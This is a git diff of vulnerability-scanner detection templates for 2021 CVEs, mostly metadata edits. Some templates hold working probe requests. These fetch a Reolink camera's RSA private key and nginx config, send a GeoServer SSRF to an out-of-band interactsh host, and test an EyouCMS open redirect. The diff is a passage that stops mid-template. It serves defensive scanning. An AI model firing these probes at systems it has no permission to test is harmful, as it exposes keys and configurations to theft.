-  tags: cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
+  tags: wpscan,cve,cve2021,wordpress,xss,wp,wp-plugin,authenticated
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-39433.yaml b/cves/2021/CVE-2021-39433.yaml
index 08d847f61a..bbc07f241b 100644
--- a/cves/2021/CVE-2021-39433.yaml
+++ b/cves/2021/CVE-2021-39433.yaml
@@ -4,11 +4,11 @@ info:
   name: BIQS IT Biqs-drive v1.83 Local File Inclusion
   author: Veshraj
   severity: high
-  description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read
-    arbitrary files from the server with the permissions of the configured web-user.
+  description: A local file inclusion vulnerability exists in version BIQS IT Biqs-drive v1.83 and below when sending a specific payload as the file parameter to download/index.php. This allows the attacker to read arbitrary files from the server with the permissions of the configured web-user.
   reference:
     - https://github.com/PinkDraconian/CVE-2021-39433/blob/main/README.md
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-39433
+    - https://biqs-drive.be/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2021/CVE-2021-39501.yaml b/cves/2021/CVE-2021-39501.yaml
index 5769d7e04a..2730857af7 100644
--- a/cves/2021/CVE-2021-39501.yaml
+++ b/cves/2021/CVE-2021-39501.yaml
@@ -7,7 +7,8 @@ info:
   description: EyouCMS 1.5.4 is vulnerable to an Open Redirect vulnerability. An attacker can redirect a user to a malicious url via the Logout function.
   reference:
     - https://github.com/eyoucms/eyoucms/issues/17
-    - https://www.cvedetails.com/cve/CVE-2021-39501
+    - https://github.com/KietNA-HPT/CVE
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-39501
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
@@ -19,12 +20,12 @@ requests:
   - method: GET
 
     path:
-      - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://example.com'
+      - '{{BaseURL}}/index.php?m=user&c=Users&a=logout&referurl=https://interact.sh'
 
     matchers:
       - type: regex
         part: header
         regex:
-          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?example\.com(?:\s*?)$'
+          - '(?m)^(?:Location\s*?:\s*?)(?:https?://|//)?(?:[a-zA-Z0-9\-_]*\.)?interact\.sh(?:\s*?)$'
 
 # Enhanced by mp on 2022/03/16
diff --git a/cves/2021/CVE-2021-40149.yaml b/cves/2021/CVE-2021-40149.yaml
new file mode 100644
index 0000000000..9d9700aaaf
--- /dev/null
+++ b/cves/2021/CVE-2021-40149.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-40149
+
+info:
+  name: Reolink E1 Zoom Camera <=3.0.0.716 - Private Key Disclosure
+  author: For3stCo1d
+  severity: medium
+  description: |
+    Reolink E1 Zoom Camera versions 3.0.0.716 and below suffer from a private key (RSA) disclosure vulnerability.
+  reference:
+    - https://dl.packetstormsecurity.net/2206-exploits/reolinke1key-disclose.txt
+    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40149.txt
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40149
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 5.9
+    cve-id: CVE-2021-40149
+    cwe-id: CWE-552
+  metadata:
+    shodan-query: http.title:"Reolink"
+    verified: "true"
+  tags: cve,cve2021,reolink,camera,iot,exposure,unauth
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/self.key"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "-----BEGIN RSA PRIVATE KEY-----"
+          - "-----END RSA PRIVATE KEY----"
+        condition: and
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-40150.yaml b/cves/2021/CVE-2021-40150.yaml
new file mode 100644
index 0000000000..ec5bf726ea
--- /dev/null
+++ b/cves/2021/CVE-2021-40150.yaml
@@ -0,0 +1,40 @@
+id: CVE-2021-40150
+
+info:
+  name: Reolink E1 Zoom Camera - Information Disclosure
+  author: For3stCo1d
+  severity: high
+  description: |
+    The web server of the E1 Zoom camera through 3.0.0.716 discloses its configuration via the /conf/ directory that is mapped to a publicly accessible path.
+    An unauthenticated attacker can abuse this with network-level access to the camera to download the entire NGINX/FastCGI configurations.
+  reference:
+    - https://dl.packetstormsecurity.net/2206-exploits/reolinke1config-disclose.txt
+    - https://github.com/MrTuxracer/advisories/blob/master/CVEs/CVE-2021-40150.txt
+    - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40150
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-40150
+    cwe-id: CWE-552
+  metadata:
+    shodan-query: http.title:"Reolink"
+    verified: "true"
+  tags: cve,cve2021,reolink,camera,exposure,iot
+
+requests:
+  - method: GET
+    path:
+      - "{{BaseURL}}/conf/nginx.conf"
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        words:
+          - "server"
+          - "listen"
+          - "fastcgi"
+        condition: and
+
+      - type: status
+        status:
+          - 200
diff --git a/cves/2021/CVE-2021-40438.yaml b/cves/2021/CVE-2021-40438.yaml
index f7d007ea32..7b31dfdea4 100644
--- a/cves/2021/CVE-2021-40438.yaml
+++ b/cves/2021/CVE-2021-40438.yaml
@@ -9,13 +9,13 @@ info:
     - https://firzen.de/building-a-poc-for-cve-2021-40438
     - https://httpd.apache.org/security/vulnerabilities_24.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-40438
+  remediation: Upgrade to Apache version 2.4.49 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:C/C:H/I:H/A:H
-    cvss-score: 9.0
+    cvss-score: 9
     cve-id: CVE-2021-40438
     cwe-id: CWE-918
-  remediation: Upgrade to Apache version 2.4.49 or later.
-  tags: cve,cve2021,ssrf,apache,mod-proxy
+  tags: cve,cve2021,ssrf,apache,mod-proxy,kev
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-40539.yaml b/cves/2021/CVE-2021-40539.yaml
index 7e6708ebee..5315ae83ea 100644
--- a/cves/2021/CVE-2021-40539.yaml
+++ b/cves/2021/CVE-2021-40539.yaml
@@ -10,13 +10,13 @@ info:
     - https://www.synacktiv.com/publications/how-to-exploit-cve-2021-40539-on-manageengine-adselfservice-plus.html
     - https://github.com/synacktiv/CVE-2021-40539
     - https://nvd.nist.gov/vuln/detail/CVE-2021-40539
+  remediation: Upgrade to ADSelfService Plus build 6114.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
     cve-id: CVE-2021-40539
     cwe-id: CWE-287
-  remediation: Upgrade to ADSelfService Plus build 6114.
-  tags: cve,cve2021,rce,ad,intrusive,manageengine
+  tags: cve,cve2021,rce,ad,intrusive,manageengine,kev
 
 requests:
 
diff --git a/cves/2021/CVE-2021-40542.yaml b/cves/2021/CVE-2021-40542.yaml
index 247ec475a8..2afe42ecd1 100644
--- a/cves/2021/CVE-2021-40542.yaml
+++ b/cves/2021/CVE-2021-40542.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-40542
 
 info:
-  name: Opensis-Classic 8.0 - Reflected Cross-Site Scripting
+  name: Opensis-Classic 8.0 - Cross-Site Scripting
   author: alph4byt3
   severity: medium
   description: |
@@ -14,6 +14,8 @@ info:
     cvss-score: 6.1
     cve-id: CVE-2021-40542
     cwe-id: CWE-79
+  metadata:
+    shodan-query: http.title:"openSIS"
   tags: xss,cve,cve2021,opensis
 
 requests:
diff --git a/cves/2021/CVE-2021-40822.yaml b/cves/2021/CVE-2021-40822.yaml
new file mode 100644
index 0000000000..a5f8bde585
--- /dev/null
+++ b/cves/2021/CVE-2021-40822.yaml
@@ -0,0 +1,47 @@
+id: CVE-2021-40822
+
+info:
+  name: Geoserver - Server-Side Request Forgery
+  author: For3stCo1d
+  severity: high
+  description: GeoServer through 2.18.5 and 2.19.x through 2.19.2 allows server-side request forgery via the option for setting a proxy host.
+  reference:
+    - https://gccybermonks.com/posts/cve-2021-40822/
+    - https://github.com/geoserver/geoserver/compare/2.19.2...2.19.3
+    - https://github.com/geoserver/geoserver/releases
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-40822
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-40822
+    cwe-id: CWE-918
+  metadata:
+    fofa-query: app="GeoServer"
+    verified: "true"
+  tags: cve,cve2021,ssrf,geoserver
+
+requests:
+  - raw:
+      - |
+        POST /geoserver/TestWfsPost HTTP/1.1
+        Host: {{Hostname}}
+        Content-Type: application/x-www-form-urlencoded
+
+        form_hf_0=&url=http://{{interactsh-url}}/geoserver/../&body=&username=&password=
+
+    matchers-condition: and
+    matchers:
+      - type: word
+        part: interactsh_protocol # Confirms the HTTP Interaction
+        words:
+          - "http"
+
+      - type: word
+        words:
+          - "<html><head></head><body>"
+
+      - type: status
+        status:
+          - 200
+
+# Enhanced by mp on 2022/06/30
diff --git a/cves/2021/CVE-2021-40856.yaml b/cves/2021/CVE-2021-40856.yaml
index e5187280cf..f129476cea 100644
--- a/cves/2021/CVE-2021-40856.yaml
+++ b/cves/2021/CVE-2021-40856.yaml
@@ -4,17 +4,18 @@ info:
   name: Auerswald COMfortel 1400/2600/3600 IP - Authentication Bypass
   author: gy741
   severity: high
-  description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration
-    management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
+  description: Auerswald COMfortel 1400/2600/3600 IP is susceptible to an authentication bypass vulnerability. Inserting the prefix "/about/../" allows bypassing the authentication check for the web-based configuration management interface. This enables attackers to gain access to the login credentials used for authentication at the PBX, among other data.
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-40856
     - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-004/-auerswald-comfortel-1400-2600-3600-ip-authentication-bypass
+    - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses
+    - http://packetstormsecurity.com/files/165162/Auerswald-COMfortel-1400-2600-3600-IP-2.8F-Authentication-Bypass.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
     cve-id: CVE-2021-40856
     cwe-id: CWE-287
-  tags: cve,cve2021,comfortel,auth-bypass,auerswald
+  tags: packetstorm,cve,cve2021,comfortel,auth-bypass,auerswald
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-40859.yaml b/cves/2021/CVE-2021-40859.yaml
index 599bea409c..6a3d2f6cf0 100644
--- a/cves/2021/CVE-2021-40859.yaml
+++ b/cves/2021/CVE-2021-40859.yaml
@@ -4,11 +4,12 @@ info:
   name: Auerswald COMpact 5500R 7.8A and 8.0B Devices Backdoor
   author: pussycat0x
   severity: critical
-  description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows
-    for resetting the administrator password.
+  description: Auerswald COMpact 5500R 7.8A and 8.0B devices contain an unauthenticated endpoint ("https://192.168.1[.]2/about_state"), enabling the bad actor to gain backdoor access to a web interface that allows for resetting the administrator password.
   reference:
     - https://thehackernews.com/2021/12/secret-backdoors-found-in-german-made.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-40859
+    - https://www.redteam-pentesting.de/en/advisories/-advisories-publicised-vulnerability-analyses
+    - https://www.redteam-pentesting.de/en/advisories/rt-sa-2021-007/-auerswald-compact-multiple-backdoors
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-40868.yaml b/cves/2021/CVE-2021-40868.yaml
index c6e919a3d5..91109ab586 100644
--- a/cves/2021/CVE-2021-40868.yaml
+++ b/cves/2021/CVE-2021-40868.yaml
@@ -8,13 +8,15 @@ info:
   reference:
     - https://packetstormsecurity.com/files/164255/Cloudron-6.2-Cross-Site-Scripting.html
     - https://nvd.nist.gov/vuln/detail/CVE-2021-40868
+    - https://packetstormsecurity.com/files/164183/Cloudron-6.2-Cross-Site-Scripting.html
+    - https://www.cloudron.io/
+  remediation: Upgrade to Cloudron 6.3 or higher.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-40868
     cwe-id: CWE-79
-  remediation: Upgrade to Cloudron 6.3 or higher.
-  tags: cve,cve2021,xss,cloudron
+  tags: cve,cve2021,xss,cloudron,packetstorm
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-40870.yaml b/cves/2021/CVE-2021-40870.yaml
index 2dce3823fb..6c01472b2d 100644
--- a/cves/2021/CVE-2021-40870.yaml
+++ b/cves/2021/CVE-2021-40870.yaml
@@ -4,8 +4,7 @@ info:
   name: Aviatrix Controller 6.x before 6.5-1804.1922 Remote Command Execution
   author: pikpikcu
   severity: critical
-  description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code
-    via directory traversal.
+  description: Aviatrix Controller 6.x before 6.5-1804.1922 contains a vulnerability that allows unrestricted upload of a file with a dangerous type, which allows an unauthenticated user to execute arbitrary code via directory traversal.
   reference:
     - https://docs.aviatrix.com/HowTos/UCC_Release_Notes.html#security-note-9-11-2021
     - https://wearetradecraft.com/advisories/tc-2021-0002/
@@ -15,7 +14,7 @@ info:
     cvss-score: 9.8
     cve-id: CVE-2021-40870
     cwe-id: CWE-434
-  tags: cve,cve2021,rce,aviatrix
+  tags: cve,cve2021,rce,aviatrix,kev,fileupload,intrusive
 
 requests:
   - raw:
diff --git a/cves/2021/CVE-2021-40875.yaml b/cves/2021/CVE-2021-40875.yaml
index 41b0380cf3..8aaaca1107 100644
--- a/cves/2021/CVE-2021-40875.yaml
+++ b/cves/2021/CVE-2021-40875.yaml
@@ -3,18 +3,20 @@ id: CVE-2021-40875
 info:
   name: Gurock TestRail Application files.md5 Exposure
   author: oscarintherocks
-  severity: medium
-  description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application,
-    disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
+  severity: high
+  description: Improper access control in Gurock TestRail versions < 7.2.0.3014 resulted in sensitive information exposure. A threat actor can access the /files.md5 file on the client side of a Gurock TestRail application, disclosing a full list of application files and the corresponding file paths which can then be tested, and in some cases result in the disclosure of hardcoded credentials, API keys, or other sensitive data.
   reference:
     - htttps://github.com/SakuraSamuraii/derailed
     - https://johnjhacking.com/blog/cve-2021-40875/
     - https://www.gurock.com/testrail/tour/enterprise-edition
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40875
   classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2021-40875
+    cwe-id: CWE-863
   metadata:
-    shodan-query: https://www.shodan.io/search?query=TestRail
+    shodan-query: http.html:"TestRail"
   tags: cve,cve2021,exposure,gurock,testrail
 
 requests:
diff --git a/cves/2021/CVE-2021-40960.yaml b/cves/2021/CVE-2021-40960.yaml
index f20672b9c9..f33d6c71e4 100644
--- a/cves/2021/CVE-2021-40960.yaml
+++ b/cves/2021/CVE-2021-40960.yaml
@@ -8,6 +8,7 @@ info:
   reference:
     - http://www.omrylmz.com/galera-webtemplate-1-0-directory-traversal-vulnerability-cve-2021-40960/
     - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-40960
+    - http://www.galera.com.tr/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 9.8
diff --git a/cves/2021/CVE-2021-40978.yaml b/cves/2021/CVE-2021-40978.yaml
index 168fbd2b7b..34a4663e8d 100644
--- a/cves/2021/CVE-2021-40978.yaml
+++ b/cves/2021/CVE-2021-40978.yaml
@@ -4,8 +4,7 @@ info:
   name: MKdocs 1.2.2 - Directory Traversal
   author: pikpikcu
   severity: high
-  description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see
-    references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
+  description: The MKdocs 1.2.2 built-in dev-server allows directory traversal using the port 8000, enabling remote exploitation to obtain sensitive information. Note the vendor has disputed the vulnerability (see references) because the dev server must be used in an unsafe way (namely public) to have this vulnerability exploited.
   reference:
     - https://github.com/mkdocs/mkdocs/pull/2604
     - https://github.com/nisdn/CVE-2021-40978
diff --git a/cves/2021/CVE-2021-41174.yaml b/cves/2021/CVE-2021-41174.yaml
index 68d15b6d33..348eadf47e 100644
--- a/cves/2021/CVE-2021-41174.yaml
+++ b/cves/2021/CVE-2021-41174.yaml
@@ -4,18 +4,18 @@ info:
   name: Grafana 8.0.0 <= v.8.2.2 Angularjs Rendering Cross-Site Scripting
   author: pdteam
   severity: medium
-  description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript
-    content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar.
-    The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
+  description: Grafana is an open-source platform for monitoring and observability. In affected versions if an attacker is able to convince a victim to visit a URL referencing a vulnerable page, arbitrary JavaScript content may be executed within the context of the victim's browser. The user visiting the malicious link must be unauthenticated and the link must be for a page that contains the login button in the menu bar. The url has to be crafted to exploit AngularJS rendering and contain the interpolation binding for AngularJS expressions.
   reference:
     - https://github.com/grafana/grafana/security/advisories/GHSA-3j9m-hcv9-rpj8
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41174
+    - https://github.com/grafana/grafana/commit/3cb5214fa45eb5a571fd70d6c6edf0d729983f82
+    - https://github.com/grafana/grafana/commit/31b78d51c693d828720a5b285107a50e6024c912
+  remediation: Upgrade to 8.2.3 or higher.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
     cve-id: CVE-2021-41174
     cwe-id: CWE-79
-  remediation: Upgrade to 8.2.3 or higher.
   metadata:
     shodan-query: title:"Grafana"
   tags: cve,cve2021,grafana,xss
diff --git a/cves/2021/CVE-2021-41192.yaml b/cves/2021/CVE-2021-41192.yaml
index 7851fda1b3..b06e4b427f 100644
--- a/cves/2021/CVE-2021-41192.yaml
+++ b/cves/2021/CVE-2021-41192.yaml
@@ -4,9 +4,7 @@ info:
   name: Redash Setup Configuration - Default Secrets Disclosure
   author: bananabr
   severity: medium
-  description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying
-    the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being
-    able to forge sessions using the known default value.
+  description: Redash Setup Configuration is vulnerable to default secrets disclosure (Insecure Default Initialization of Resource). If an admin sets up Redash versions <=10.0 and prior without explicitly specifying the `REDASH_COOKIE_SECRET` or `REDASH_SECRET_KEY` environment variables, a default value is used for both that is the same across all installations. In such cases, the instance is vulnerable to attackers being able to forge sessions using the known default value.
   reference:
     - https://hackerone.com/reports/1380121
     - https://github.com/getredash/redash/security/advisories/GHSA-g8xr-f424-h2rv
@@ -18,7 +16,7 @@ info:
     cwe-id: CWE-1188
   metadata:
     shodan-query: http.favicon.hash:698624197
-  tags: cve,cve2021,redash,auth-bypass
+  tags: hackerone,cve,cve2021,redash,auth-bypass
 
 requests:
   - method: GET
diff --git a/cves/2021/CVE-2021-41277.yaml b/cves/2021/CVE-2021-41277.yaml
index 732b004427..b2dd58b649 100644
--- a/cves/2021/CVE-2021-41277.yaml
+++ b/cves/2021/CVE-2021-41277.yaml
@@ -3,23 +3,22 @@ id: CVE-2021-41277
 info:
   name: Metabase Local File Inclusion
   author: 0x_Akoko
-  severity: critical
-  description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add
-    a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.
+  severity: high
+  description: Metabase is an open source data analytics platform. In affected versions a local file inclusion security issue has been discovered with the custom GeoJSON map (`admin->settings->maps->custom maps->add a map`) support and potential local file inclusion (including environment variables). URLs were not validated prior to being loaded.
   reference:
     - https://github.com/metabase/metabase/security/advisories/GHSA-w73v-6p7p-fpfr
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41277
     - https://twitter.com/90security/status/1461923313819832324
+    - https://github.com/metabase/metabase/commit/042a36e49574c749f944e19cf80360fd3dc322f0
+  remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation filter before the application.
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:L
-    cvss-score: 10.0
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2021-41277
-    cwe-id: CWE-200
-  remediation: This issue is fixed in 0.40.5 and .40.5 and higher. If you are unable to upgrade immediately, you can mitigate this by including rules in your reverse proxy or load balancer or WAF to provide a validation
-    filter before the application.
+    cwe-id: CWE-20
   metadata:
-    shodan-query: http.title:"Metabase"
     fofa-query: app="Metabase"
+    shodan-query: http.title:"Metabase"
   tags: cve,cve2021,metabase,lfi
 
 requests:
diff --git a/cves/2021/CVE-2021-41282.yaml b/cves/2021/CVE-2021-41282.yaml
index ea682e9782..dd47dc6888 100644
--- a/cves/2021/CVE-2021-41282.yaml
+++ b/cves/2021/CVE-2021-41282.yaml
@@ -1,16 +1,18 @@
 id: CVE-2021-41282
 
 info:
-  name: pfSense Arbitrary File Write to RCE
+  name: pfSense - Arbitrary File Write
   author: cckuailong
   severity: high
-  description: diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat
-    utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (i.e., the usage of the escapeshellarg function for the arguments) are used, it
-    is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
+  description: |
+    diag_routes.php in pfSense 2.5.2 allows sed data injection. Authenticated users are intended to be able to view data about the routes set in the firewall. The data is retrieved by executing the netstat utility, and then its output is parsed via the sed utility. Although the common protection mechanisms against command injection (e.g., the usage of the escapeshellarg function for the arguments) are used, it is still possible to inject sed-specific code and write an arbitrary file in an arbitrary location.
   reference:
     - https://www.shielder.it/advisories/pfsense-remote-command-execution/
     - https://www.rapid7.com/db/modules/exploit/unix/http/pfsense_diag_routes_webshell/
+    - https://docs.netgate.com/downloads/pfSense-SA-22_02.webgui.asc
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41282
+  remediation: |
+    Upgrade to pfSense CE software version 2.6.0 or later, or pfSense Plus software version 22.01 or later.
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
     cvss-score: 8.8
@@ -54,4 +56,6 @@ requests:
         dsl:
           - "contains(body, 'c3959e8a43f1b39b0d1255961685a238')"
           - "status_code==200"
-        condition: and
\ No newline at end of file
+        condition: and
+
+# Enhanced by cs 06/30/2022
diff --git a/cves/2021/CVE-2021-41291.yaml b/cves/2021/CVE-2021-41291.yaml
index 2cc75d0c4a..10aefe5f92 100644
--- a/cves/2021/CVE-2021-41291.yaml
+++ b/cves/2021/CVE-2021-41291.yaml
@@ -4,12 +4,12 @@ info:
   name: ECOA Building Automation System - Directory Traversal Content Disclosure
   author: gy741
   severity: high
-  description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on
-    the affected device
+  description: The ECOA BAS controller suffers from a directory traversal content disclosure vulnerability. Using the GET parameter cpath in File Manager (fmangersub), attackers can disclose directory content on the affected device
   reference:
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41291
     - https://www.zeroscience.mk/en/vulnerabilities/ZSL-2021-5670.php
     - https://www.twcert.org.tw/en/cp-139-5140-6343c-2.html
+    - https://www.twcert.org.tw/tw/cp-132-5127-3cbd3-1.html
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
     cvss-score: 7.5
diff --git a/cves/2021/CVE-2021-41349.yaml b/cves/2021/CVE-2021-41349.yaml
index c1c31e9fbf..f64dfee974 100644
--- a/cves/2021/CVE-2021-41349.yaml
+++ b/cves/2021/CVE-2021-41349.yaml
@@ -1,7 +1,7 @@
 id: CVE-2021-41349
 
 info:
-  name: Microsoft Exchange Server Pre-Auth POST Based Reflected Cross-Site Scripting
+  name: Microsoft Exchange Server Pre-Auth POST Based Cross-Site Scripting
   author: rootxharsh,iamnoooob
   severity: medium
   description: Microsoft Exchange Server is vulnerable to a spoofing vulnerability. Be aware this CVE ID is unique from CVE-2021-42305.
@@ -38,8 +38,13 @@ requests:
         words:
           - 'text/html'
 
+      - type: word
+        words:
+          - "A potentially dangerous Request.Form value was detected from the client"
+        negative: true
+
       - type: status
         status:
           - 500
 
-# Enhanced by mp on 2022/03/07
+# Enhanced by xiaostrong on 2022/05/26
diff --git a/cves/2021/CVE-2021-41381.yaml b/cves/2021/CVE-2021-41381.yaml
index d755e344f8..3967477b8a 100644
--- a/cves/2021/CVE-2021-41381.yaml
+++ b/cves/2021/CVE-2021-41381.yaml
@@ -3,14 +3,15 @@ id: CVE-2021-41381
 info:
   name: Payara Micro Community 5.2021.6 Directory Traversal
   author: pikpikcu
-  severity: medium
+  severity: high
   description: Payara Micro Community 5.2021.6 and below contains a directory traversal vulnerability.
   reference:
     - https://www.syss.de/fileadmin/dokumente/Publikationen/Advisories/SYSS-2021-054.txt
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41381
+    - https://www.payara.fish
   classification:
-    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
-    cvss-score: 5.3
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
     cve-id: CVE-2021-41381
     cwe-id: CWE-22
   tags: cve,cve2021,payara,lfi
diff --git a/cves/2021/CVE-2021-41467.yaml b/cves/2021/CVE-2021-41467.yaml
index 6ccc7bd0dd..616ba257a0 100644
--- a/cves/2021/CVE-2021-41467.yaml
+++ b/cves/2021/CVE-2021-41467.yaml
@@ -1,13 +1,14 @@
 id: CVE-2021-41467
 
 info:
-  name: JustWriting  -  Reflected Cross-Site Scripting
+  name: JustWriting  -  Cross-Site Scripting
   author: madrobot
   severity: medium
   description: A cross-site scripting vulnerability in application/controllers/dropbox.php in JustWriting 1.0.0 and below allow remote attackers to inject arbitrary web script or HTML via the challenge parameter.
   reference:
     - https://github.com/hjue/JustWriting/issues/106
     - https://nvd.nist.gov/vuln/detail/CVE-2021-41467
+    - https://github.com/hjue/JustWriting/
   classification:
     cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
     cvss-score: 6.1
diff --git a/cves/2021/CVE-2021-41569.yaml b/cves/2021/CVE-2021-41569.yaml
new file mode 100644
index 0000000000..e618bac41d
--- /dev/null
+++ b/cves/2021/CVE-2021-41569.yaml
@@ -0,0 +1,35 @@
+id: CVE-2021-41569
+
+info:
+  name: SAS/Internet 9.4 1520 - Local File Inclusion
+  author: 0x_Akoko
+  severity: high
+  description: SAS/Internet 9.4 build 1520 and earlier allows local file inclusion. The samples library (included by default) in the appstart.sas file, allows end-users of the application to access the sample.webcsf1.sas program, which contains user-controlled macro variables that are passed to the DS2CSF macro.
+  reference:
+    - https://www.mindpointgroup.com/blog/high-risk-vulnerability-discovery-localfileinclusion-sas
+    - https://support.sas.com/kb/68/641.html
+    - https://nvd.nist.gov/vuln/detail/CVE-2021-41569
+  classification:
+    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
+    cvss-score: 7.5
+    cve-id: CVE-2021-41569
+    cwe-id: CWE-829
+  tags: cve,cve2021,sas,lfi
+
+requests:
+  - method: GET
+    path:
